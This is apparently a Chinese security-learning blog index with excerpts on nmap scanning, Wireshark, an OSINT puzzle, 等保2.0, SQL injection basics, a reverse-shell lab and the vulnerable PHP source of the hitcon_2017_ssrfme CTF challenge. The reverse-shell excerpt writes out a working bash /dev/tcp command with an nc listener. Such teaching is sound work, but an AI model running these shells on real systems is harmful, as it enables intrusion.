NMAP的基本使用
NMAP的基本使用简介 nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术
初次使用(这里使用kali自带的作为演示)
首先我们要知道这工具该怎么用,
在kali打开终端,输入如下命令,可以知道有哪些命令
nmap -h
最基本的命令nmap ip(域名)//可以扫描出其对外开放的服务
如
nmap www.baidu.com
nmap xxx.xxx.xxx.xxx
端口扫描常用参数
-sT TCP connect()扫描:这是最基本的TCP扫描方式。connect()是一种系统调用,由操作系统提供,用来打开一个连接。如果目标端口有程序监听,connect()就会成功返回,否则这个端口是不可达的。
-sS TCP同步扫描(TCP SYN):因为不必全部打开一个TCP连接,所以这项技术通常称为半开扫描(half-open)。你可以发出一个TCP同步包(SYN),然后等待回应。如果对方返回SYN|ACK(响应)包就表示目标端口正在监听;如果返回RST数据包,就表示目标端口 ...
linux反弹shell
linux反弹shell客户机:ubuntu
ip: 192.168.118.130
攻击机:kali
ip:192.168.118.128
1.bash反弹攻击机执行命令:
nc -lvp 8888
客户机执行命令:
bash -i >& /dev/tcp/192.168.118.128/8888 0>&1
然后攻击机这边成功拿到shell
原理bash -i >& /dev/tcp/远程ip/port 0>&1
bash是/bin/目录下的二进制程序
/dev/tcp是Linux中的一个特殊设备,打开这个文件相当于发出了一个socket调用,建立一个socket连接。
0>&: 当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
0>&1: 在命令后面加上0>&1,表示将标准输入重定向到标准输出,这里的标准输出已经重定向到了/dev/tcp/远程ip/port这个 ...
Wireshark分析ping的数据包
Wireshark分析ping的数据包1.抓取ping数据包打开Wireshark 开启抓包,打开cmd输入ping github.com 回车
在Wireshark的中条件过滤栏输入“icmp”
可以看到8个报文,其中有4个请求报文和4个应答报文
2.分析其中一个报文(request)物理层可以看到ping request数据链路层报文一共有74个字节,帧序号为258,使用的协议为icmp协议
数据链路层这里有发送数据帧的源节点MAC地址和接收数据帧的目标节点MAC地址
网络层这里包含着发送数据帧的源节点IP地址和接收数据帧的目标节点IP地址
传输层
hitcon_2017_ssrfme
hitcon_2017_ssrfme <?php
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);
@chdir($sandbox);
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename" ...
网络迷踪
网络迷踪题目从图中信息找到该麦当劳门店所在位置:
图中获取到的信息
这是小票上的信息erbang alaf restaurants,Tesco pe…,jalan SS21/39
麦当劳 McDonald’s
搜索引擎搜索
erbang alaf restaurants
2.搜索gerbang alaf restaurants address ,发现是一家名为Gerbang Alaf Restaurant Sdn Bhd的店,地点锁定在马来西亚
翻译一下: Level 6, Bangunan TH, Damansara Uptown 3. No 3, Jalan SS21/39, 47400 Petaling Jaya.得到其详细地址
然后用谷歌地图定位应该就可以了
这是网上找到的答案
等保2.0
等保2.0等保1.0回顾在开始讲等保2.0之前,让我们先回顾一下等保1.0。等保1.0发布距今已经有10多年的时间,在这些日子里,网络安全也越来越被人们所重视。
在1.0的初期,企业只要有安全意识,能开始做等保,开始测评就已经很不错了;到了中期,整体防护,渗透测试,合规开始等于安全。行业等级保护全面开展,等保开始逐渐的深入人心;再到1.0的后期,无论是企业层面还是国家层面,都更注重实质性的安全。主动防御、态势感知、攻防对抗等安全手段开始流行,云安、大数据、工控安全和移动安全开始占领主要趋势。
等保1.0普及了等保概念,强化了安全意识,从单个系统到部门、到行业,再到上升到国家层面从合规到攻防对抗,整体提升了网络安全保障能力技术并且不断进行人才的积累,这些都对等保2.0提供了有力的支撑。
等保2.0是什么?等保2.0全称网络安全等级保护2.0制度,是我国网络安全领域的基本国策、基本制度。等级保护标准在1.0时代标准的基础上,注重主动防御,从被动防御到事前、事中、事后全流程的安全可信、动态感知和全面审计,实现了对传统信息系统、基础信息网络、云计算、大数据、物联网、移动互联网和工业控制信息系统 ...
s q l注入小结
s q l 注入的小总结原理: 就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
s q l注入攻击一般流程:1.判断注入点: 判断一个链接是否存在注入漏洞,可以通过对其传入的参数(但不仅仅只限于参数,还有cookie注 入,HTTP头注入等) 进行构造,然后对服务器返回的内容进行判断来查看是否存在注入点。
2.判断注入点类型
按照参数类型分类:
(1)数字型注入: 如id=1 ,传入的参数是数字,注入时该参数不需要用单或双引号构造闭合。
(2)字符型注入:如username=admin ,传入的参数是字符或字符串,注入时要注意去构造闭合。
按照数据请求方式分类:
(1)GET注入
(2)POST注入
(3)HTTP请求头注入
按照语句执 ...